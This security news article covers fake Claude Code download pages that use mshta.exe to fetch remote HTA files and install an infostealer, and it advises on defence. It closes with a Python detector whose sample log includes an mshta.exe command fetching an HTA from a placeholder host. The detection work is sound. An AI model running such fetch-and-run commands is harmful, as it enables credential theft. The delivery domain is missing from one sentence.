Cybercriminals are leveraging fake download pages impersonating the AI coding assistant Claude Code to distribute infostealer malware. This tactic exploits the growing trust in AI tools among developers and IT professionals, tricking them into downloading malicious files disguised as legitimate software. The campaign was observed using .com as a delivery domain, with carefully crafted fake download portals designed to mimic official sites, leading unsuspecting users to deploy malware.
The cybersecurity analyst Maurice Fielenbach identified the campaign, noting its sophisticated use of a legitimate Microsoft binary, mshta.exe, to execute an infostealer. This method, known as “Living off the Land,” allows attackers to run malicious code directly from remote sources without dropping traditional executable files on a victim’s system, significantly reducing the chance of detection. The trend highlights a broader issue where threat actors exploit the popularity and perceived trustworthiness of AI platforms to conduct their operations.
MSHTA-Based Execution and LOLBin Abuse Targets Developers with Fake Claude Code Downloads
The proliferation of AI-assisted coding platforms has created a fertile ground for cyber threats. As more developers integrate these tools into their workflows, they become potential targets for sophisticated phishing and malware campaigns. The use of Claude Code, a legitimate and widely adopted AI coding assistant, as bait in this instance is a clear indicator of this evolving threat landscape. Attackers aim to bypass the general security awareness of users by impersonating trusted software.
The attack chain begins when a user visits a deceptive website mimicking an official Claude Code download portal. These pages are designed to appear entirely legitimate, offering buttons that, when clicked, initiate the download of a file. However, this file is not the intended software. Instead, it triggers a malicious execution process that silently installs an infostealer onto the victim’s computer. The convincing appearance of these fake pages makes it difficult for users to distinguish the genuine from the malicious.
Fielenbach emphasized that mshta.exe, a signed Microsoft Windows binary, continues to be a critical process for security defenders to monitor. Attackers frequently abuse this legitimate tool to execute malicious HTML Application (HTA) files fetched directly from remote servers. This “Living off the Land” technique, cataloged under MITRE ATT&CK as T1218.005, allows malware to operate stealthily, often evading standard antivirus detection. The execution of HTA files from remote sources using mshta.exe serves as a high-signal indicator of malicious activity.
The broader implications of this campaign are significant for individuals and organizations alike. The infostealer is designed to harvest sensitive data, including browser credentials, session tokens, and other confidential information, which is then exfiltrated to attacker-controlled infrastructure. For developers, the primary targets, compromised credentials can provide access to valuable intellectual property such as code repositories, cloud environments, and internal company systems. This can escalate into widespread organizational security breaches, causing substantial financial and reputational damage.
The infection mechanism relies heavily on the abuse of mshta.exe, a trusted component of the Windows operating system. Because it is a native binary, its execution is often overlooked by security software that may not flag its activity by default, keeping its operation relatively low-profile. This “Living off the Land” abuse is particularly effective because it avoids introducing new, unknown executables to the system. The payload is executed entirely within memory, making forensic analysis after an attack considerably more challenging.
When a user falls victim to a fake Claude Code download page, mshta.exe is invoked to fetch and execute a remote HTA file. This HTA file contains embedded malicious scripts that perform the infostealer’s core functions. The process of collecting credentials, browser data, and other sensitive information happens entirely in memory, leaving minimal traces on the victim’s hard drive. The absence of a traditional executable file installation further complicates the detection and recovery efforts for incident response teams.
Security teams are strongly urged to implement enhanced logging for all mshta.exe activity across their endpoints. Special attention should be paid to any instances where mshta.exe connects to external URLs, as this is a key indicator of potential compromise. Where operationally feasible, organizations should also consider using application control policies to restrict the execution of mshta.exe, especially from untrusted sources. End-users are advised to exercise extreme caution and always verify software downloads directly from official vendor websites, avoiding third-party or unfamiliar sources regardless of how legitimate they may appear.
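The monitoring advice above can be turned into a concrete rule: flag any mshta.exe process creation whose command line points at a remote source. The following is an added example, not code from the article or from any vendor; it runs over constructed Sysmon-style process-creation events (JSON lines), and the hostnames, usernames and URL in the sample log are placeholders.

```python
# Added example (not from the article or any vendor): a minimal detector for
# T1218.005-style abuse, run over constructed Sysmon-style process-creation
# events serialised as JSON lines. Hostnames, users and the URL are placeholders.
import json
import re

# Remote sources mshta.exe can pull an HTA from: http(s) URLs and UNC paths.
REMOTE_SOURCE = re.compile(r"""(https?://[^\s"']+|\\\\[^\s"']+)""", re.IGNORECASE)

def is_mshta(image: str) -> bool:
    """True when the process image is mshta.exe, whatever directory it sits in."""
    return image.replace("/", "\\").lower().rsplit("\\", 1)[-1] == "mshta.exe"

def analyze_event(event: dict):
    """Return a finding for an mshta.exe launch that references a remote
    source, or None when the event is not the pattern the article describes."""
    if not is_mshta(event.get("Image", "")):
        return None
    match = REMOTE_SOURCE.search(event.get("CommandLine", ""))
    if match is None:
        return None  # local HTA: weaker signal, not flagged by this rule
    return {
        "host": event.get("Computer"),
        "user": event.get("User"),
        "parent": event.get("ParentImage"),
        "remote_source": match.group(1),
        "technique": "T1218.005",
    }

def scan(log_lines):
    """Parse JSON-lines events and collect findings, skipping blank lines."""
    findings = []
    for line in log_lines:
        if line.strip():
            finding = analyze_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings

# Constructed sample log: one remote-HTA launch from a downloaded installer
# script, one benign local HTA, one unrelated process.
SAMPLE_LOG = r"""
{"Computer":"DEV-WS01","User":"CORP\\dev1","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe \"https://example.invalid/claude-code/setup.hta\"","ParentImage":"C:\\Users\\dev1\\Downloads\\ClaudeCodeSetup.cmd"}
{"Computer":"DEV-WS02","User":"CORP\\dev2","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta.exe C:\\Program Files\\Vendor\\help.hta","ParentImage":"C:\\Program Files\\Vendor\\app.exe"}
{"Computer":"DEV-WS02","User":"CORP\\dev2","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe notes.txt","ParentImage":"C:\\Windows\\explorer.exe"}
"""
```

Calling `scan(SAMPLE_LOG.splitlines())` yields a single finding for DEV-WS01; the local HTA launch stays unflagged, so the rule keeps the high-signal remote-fetch case separate from ordinary mshta.exe use.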